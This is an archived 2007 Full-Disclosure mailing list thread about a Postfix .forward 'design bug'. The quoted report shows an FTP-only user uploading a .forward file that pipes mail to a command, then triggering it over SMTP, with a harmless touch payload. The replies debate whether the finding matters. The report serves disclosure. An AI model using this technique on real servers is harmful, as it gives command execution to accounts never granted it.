| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <a3663b3d0712141152g6bc84222ld0dccbc9d42a449a@mail.gmail.com>
Date: Fri, 14 Dec 2007 13:52:33 -0600
From: "Adam N" <interfect@...il.com>
To: "Fredrick Diggle" <fdiggle@...il.com>
Cc: kcope <kingcope@....net>, full-disclosure@...ts.grok.org.uk
Subject: Re: Small Design Bug in Postfix - REMOTE
No, the idea is that you are a user with no login access, only FTP.
By doing this, you get shell access (with sane privileges, thankfully) when
you're supposed to only have FTP.
On Dec 13, 2007 2:34 PM, Fredrick Diggle <fdiggle@...il.com> wrote:
> You have write perms on a users home directory and this was the best way
> you could come up with to execute commands? Please send me details on your
> recipe for boiled water. Be sure to gzip it though as I imagine it is
> several pages long.
>
> YAY!
>
>
> On Dec 13, 2007 2:18 PM, kcope <kingcope@....net> wrote:
>
> > Small Design Bug in Postfix - REMOTE
> >
> > There's a small issue on how Postfix forwards mails.
> > A user can have a .forward file in her home directory.
> > Inside this file she can specifiy an alternative recipient
> > or use aliasing to execute commands when mail is received.
> > >From the manpage ALIASES(5)
> > "aliases - Postfix local alias database format"
> >
> > |command
> > Mail is piped into command. Commands that contain
> > special characters, such as whitespace, should be
> > enclosed between double quotes. See local(8) for
> > details of delivery to command.
> >
> > When the command fails, a limited amount of command
> > output is mailed back to the sender. The file
> > /usr/include/sysexits.h defines the expected exit
> > status codes. For example, use "|exit 67" to simu-
> > late a "user unknown" error, and "|exit 0" to
> > implement an expensive black hole.
> >
> > This is fine since postfix properly drops privileges before
> > executing the command.
> > The Problem with executing commands via .forward files is that
> > if someone manages to place a file into ones home directory and
> > just sends a file to the mailserver she can execute commands
> > even when she's not supposed to or does not have the privileges.
> >
> > Here is an example exploitation session, the user 'rootkey'
> > only has ftp access with write permissions and no other privileges than
> > that.
> >
> > Login to FTP server
> > >telnet box 21
> > >USER rootkey
> > >PASS rootkey123
> > <logged in
> >
> > Put .forward file with following contents into the home directory of
> > user 'rootkey'.
> >
> > ---snip---
> > |touch /tmp/XXX
> > ---snip---
> >
> > >put .forward
> >
> > Now send an email to user rootkey.
> >
> > >telnet box 25
> > >mail from: rootkey
> > >rcpt to: rootkey
> > >data
> > >.
> >
> > RESULT:
> >
> > kcope@box:~$ ls /tmp/testXXX
> > /tmp/testXXX
> >
> >
> > signed,
> >
> > - -kcope/2007
> >
> > --
> > GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
> > Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists